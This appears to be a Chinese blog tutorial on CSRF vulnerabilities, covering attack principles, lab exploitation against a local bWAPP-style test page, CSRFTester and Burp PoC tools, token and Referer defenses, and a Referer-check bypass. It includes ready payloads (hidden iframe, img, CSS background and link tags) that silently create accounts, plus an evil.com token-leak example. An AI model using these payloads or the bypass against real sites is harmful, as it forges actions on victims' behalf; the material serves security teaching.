第五章-CSRF漏洞

最新推荐文章于 2023-11-13 17:18:03 发布
最新推荐文章于 2023-11-13 17:18:03 发布
阅读量700 收藏 1
点赞数
文章标签: csrf php 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zerostruggle/article/details/127668200
版权

第五章-CSRF漏洞

第一节 CSRF原理介绍

1.1 CSRF漏洞定义

​ CSRF(Cross-site request forery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF。

XSS与CSRF区别:

1、XSS利用站点内的信任用户,盗取Cookie;

2、CSRF通过伪装成受信任用户请求受信任的网站。

1.2 CSRF漏洞原理

利用目标用户的合法身份,以目标用户的名义执行某些非法操作。

例如:简单转账案例

初始化链接:http://www.xxx.com/pay.php?user=xx&money=100

构造恶意丽链接:

http://www.xxx.com/pay.php?user=恶意用户&money=10000

1.3 CSRF漏洞代码分析

<?php
	//会话验证
	$user = $_GET[“user”];
	$money = $_GET[“money”];
	//转账操作
?>

由此可以得出CSRF成功利用条件:

1、用户已经登陆系统

2、用户访问对应URL

1.4 CSRF漏洞利用

以BWAPP CSRF1中的Low级别为例。

第二节 无防护的CSRF漏洞利用

2.1 GET型CSRF代码分析

2.2 GET型CSRF利用

构造GET型 URL,提交username和password参数,以此来新建对应的用户名和密码。

http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=admin111111&password=132251231

隐蔽利用 img标签 src属性

2.3 POST型CSRF代码分析

2.4 POST型CSRF利用

设置表单用于提交。例如:<input type=”hidden” name=”username” value=”1111” />

第三节 CSRF漏洞自动化探测

3.1 手动探测原理

手动探测原理在于探测web应用程序具有防止CSRF的措施。

如果Web应用程序的HTTP请求中没有对应的预防措施,那么很大程度上就确定存在CSRF漏洞。

3.2 自动化探测工具介绍

​ CSRFTester是一款CSRF漏洞的测试工具。

​ CSRFTester工具的测试原理大概是这样的,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修测试的请求成功被网站服务器接受,则说明存在CSRF漏洞,当然此款工具也可以被用来进行CSRF攻击。

下载地址:https://www.owasp.org/index.php/File:CSRFTester-1.0.zip

3.3 自动化探测工具使用

1、设置浏览器代理:127.0.0.1:8008

2、登录Web应用程序,提交表单,在CSRF工具中修改表单内容,查看是否更改,如果更改表面存在CSRF漏洞。

3、生产POC代码。

3.4 利用CSRF漏洞

使用服务器搭建CSRF POC访问页面。

一定不要轻易点击一些未知链接。

第四节 CSRF漏洞token防御介绍

4.1 漏洞修补逻辑分析

​ CSRF漏洞实质:服务器无法准确判断当前请求是否是合法用户的自定义操作。

​ 如果服务器在用户登录之后给予用户一个唯一合法令牌,每一次操作过程中,服务器都会验证令牌是否正确,如果正确那么执行操作。不正确不执行操作。

​ 一般情况下,给予的令牌会写入表单中隐藏域的value值中,随着表单内容进行提交。

4.2 简单代码模型分析

​ 远程构造CSRF利用POC,那么直接中招。如果利用在增删改中设置唯一令牌,执行操作时只有提交令牌才能操作的话,就可以有效防止CSRF。如果令牌不正确,那么不执行操作。并给出提示内容。

4.3 生成token代码分析

Token作为识别操作是否是当前用户自己操作的唯一凭证,需要设置为复杂难以被破解的内容。

例如:

function generateToken(){

 $salt = “test” . date("Y/m/d") ;  出现问题

 $token = md5($salt);

 return $token;

}
调用函数查看生成的token

4.4 使用token进行CSRF漏洞防御

1、登录验证成功之后,在会话SESSION[“user_token”]中保存Token。

2、在后台操作中,增删改表单中添加隐藏域 hidden,设置value为Token。

3、提交之后进行验证Token是否正确。

简化代码演示:

Token验证过程,从实践中理解Token防御CSRF的过程。

第五节 CSRF绕过refer技巧

5.1 Referer防御CSRF原理

​ HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。

​ 当用户点击被构造好的CSRF利用页面,那么在执行用户对应操作时,提交的HTTP请求中就有对应的Referer值,此时服务端判断Referer值是否与服务器的域名信息有关。如果不相关则不执行操作。

5.2 Referer防御代码编写

在PHP中使用 $_SERVER['HTTP_REFERER'] 获取页面提交请求中的Referer值。

<?php
 if(strpos($_SERVER['HTTP_REFERER'],'xx.com') !== false)
 {
 	判断成功
 }
 else
 {
 	判断失败
 }
?>

5.3 绕过Referer技巧

技巧:如果服务端只判断当前的Referer中是否具有域名,那么直接可以新建文件夹进行绕过。

5.4 Burpsuite自动生成POC

利用Burpsuite自动生成CSRF POC。

第六节 GET型CSRF漏洞利用方法

6.1 链接利用

在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。

移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。

<a href = “请求地址,会被http 请求到的未知,可以携带GET型参数”> 内容 </a>
<a href = “http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”>请点击我</a>

6.2 iframe利用

iframe标签内容将在页面加载过程中自动进行加载, src指向的位置就是页面请求的位置

注意:可以设置iframe 的 style -> display:none,以此来不显示iframe加载的内容。
<iframe src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” style=”display:none” />

6.3 img标签利用

img标签的内容会随着页面加载而被请求,以此src指向的位置会在页面加载过程中进行请求。

<img src=”http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456” />

6.4 CSS-background利用

可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求

例如:

body
  { 
  background: #00FF00 url(bgimage.gif) no-repeat fixed top;
  }

可以利用 CSS中 background样式中的url来加载远程机器上的内容,从而对url中的内容发送HTTP请求

例如:

body
  { 
  background: #00FF00 url(“http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=liuxiaoyang&password=123456”) no-repeat fixed top;
  }

第七节 CSRF漏洞防御介绍

7.1 验证码防御

​ 验证码防御被认为是对抗CSRF最为简单而且有效的防御方法。

​ CSRF在用户不知情的情况下完成对应操作,而验证码强制用户与应用程序交互,才能最终完成操作。通常情况下,验证码能够很好的遏制CSRF。

​ 出于用户体验考虑,不可能每一个操作都加入验证码。所以验证码只作为辅助手段,不能作为防御CSRF的主要解决方案。

​ 验证码防御也可以被认为是二次验证

7.2 Referer Check防御

​ Referer Check主要用于防止盗链。同理也可以用来检查请求是否来自合法的“源”。

​ 比如用户修改密码,一定是在登录系统后台之后进行操作。所以在修改提交表单的时候,一定会从系统后台页面提交。携带Referer头。如果Referer不是当前系统的域,那么极有可能遭受CSRF。

​ 缺陷:服务器并非任何时候都可以取到Referer。例如HTTPS跳转到HTTP。

7.3 Anti CSRF Token防御

CSRF本质原因:重要操作的所有参数都是被恶意攻击者猜测到的。

那么防御措施就是生成一个随机且不被轻易猜测的参数。目前大多数防御都采用token(不可预测)。

7.4 Token泄露

例如:GET型Token泄露

页面包含 <img src=”http://evil.com/” /> 那么请求中的Referer就会携带对应的GET Token。

例如:POST型Token泄露
利用XSS漏洞读取Cookie,获取存储在其中的Token值。

guoyuxin3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF漏洞概述及原理
m0_74131821的博客
04-03 628
CSRF 漏洞经常被用来制作蠕虫攻击、刷 SEO 流量等
CSRF漏洞详解 一文了解CSRF漏洞
闵行小鱼塘
11-11 2435
本篇总结归纳CSRF漏洞
CSRF漏洞
热门推荐
weixin_39861994的博客
10-29 1万+
一、CSRF漏洞介绍: CSRF是指利用受害者尚未失效的身份认证信息( cookie、会话 等信息),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下 以受害者的身份向服务器发送请求,从而完成非法操作(如转账、改密、信息修改等操作)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用 二、CSRF类型: get请求型CSRF 只需要构造URL,然后诱导受害者访问利用。 POST请求型CSRF 构造自动提交的...
CSRF漏洞详解
xcxhzjl的博客
11-19 3142
一、CSRF漏洞原理 1、基本原理 CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。 CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。 CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。 2、流程图 3、条件 ●用户成功登陆了网站系统,能执行授权的功能 ●目标用户访
10-CSRF的攻击与防御1
08-03
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种网络攻击方式,它利用了浏览器自动发送Cookie的特性,使攻击者能够以受害者的身份执行非预期的操作。在讨论CSRF攻击时,我们需要理解其基本原理、常见场景、...
跨站请求伪造-CSRF防护方法
03-12
2.尽量少用或不要用request()类变量,获取参数指定request.form()还是request.querystring(),这样有利于阻止CSRF漏洞攻击,此方法只不能完全防御CSRF攻击,只是一定程度上增加了攻击的难度。 代码示例: Java代码...
5分钟科普CSRF攻击与防御,Web安全的第一防线
02-25
目录:一、CSRF介绍二、CSRF攻击的危害三、CSRF攻击原理及过程四、CSRF漏洞检测五、CSRF漏洞预防六、最后聊聊xssCSRF(Cross-siterequestforgery)跨站请求伪造,也被称为“OneClickAttack”或者SessionRiding,通常...
Python-使用CSS注入来窃取CSRF令牌无iFrames
08-10
1. 发现目标网站的CSRF漏洞,即允许用户提交任意CSS代码。 2. 构造恶意CSS代码,利用CSS选择器暴露隐藏的令牌。 3. 将恶意CSS注入目标页面,通常通过构造特殊URL或者XSS攻击来实现。 4. 使用Python编写脚本,持续...
网络安全之CSRF漏洞
qq_52074678的博客
05-08 1462
目录 一.什么是CSRF漏洞🍔🍔🍔 1.实现流程 2.原理 二CSRF案例分析 2.CSRF漏洞的危害 3.CSRF和XSS区别 4.CSRF playload 1)通过图片的img src属性,自动加载,发起GET请求 2)构建一个超链接,用户点击以后,发起GET请求 3)构建一个隐藏表单,用户访问,自动提交,发起POST请求 三CSRF漏洞挖掘 1.检测工具 四CSRF漏洞防御 1.防御思路 a。我们能不能区分一个请求是来自于自己的前端页面,还是第三方的网站? HTT
CSRF 漏洞详解
最新发布
一个努力学习网安的小牛马
11-13 561
CSRF漏洞详解
CSRF漏洞原理攻击与防御(非常细)
m0_61869253的博客
10-12 3296
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
CSRF漏洞详解与挖掘
qq_53058639的博客
02-27 610
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。每次访问修改密码的页面时,服务器都会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token是否正确,只有token正确,才会继续处理客户端请求。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
当前系统未对referer进行校验,存在csrf漏洞风险
07-14
您提到当前系统未对referer进行校验,这可能存在CSRF(Cross-Site Request Forgery)漏洞风险。CSRF攻击是一种利用受害者在已经登录的情况下,通过伪造请求来执行非法操作的攻击方式。为了防止CSRF攻击,您可以考虑...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值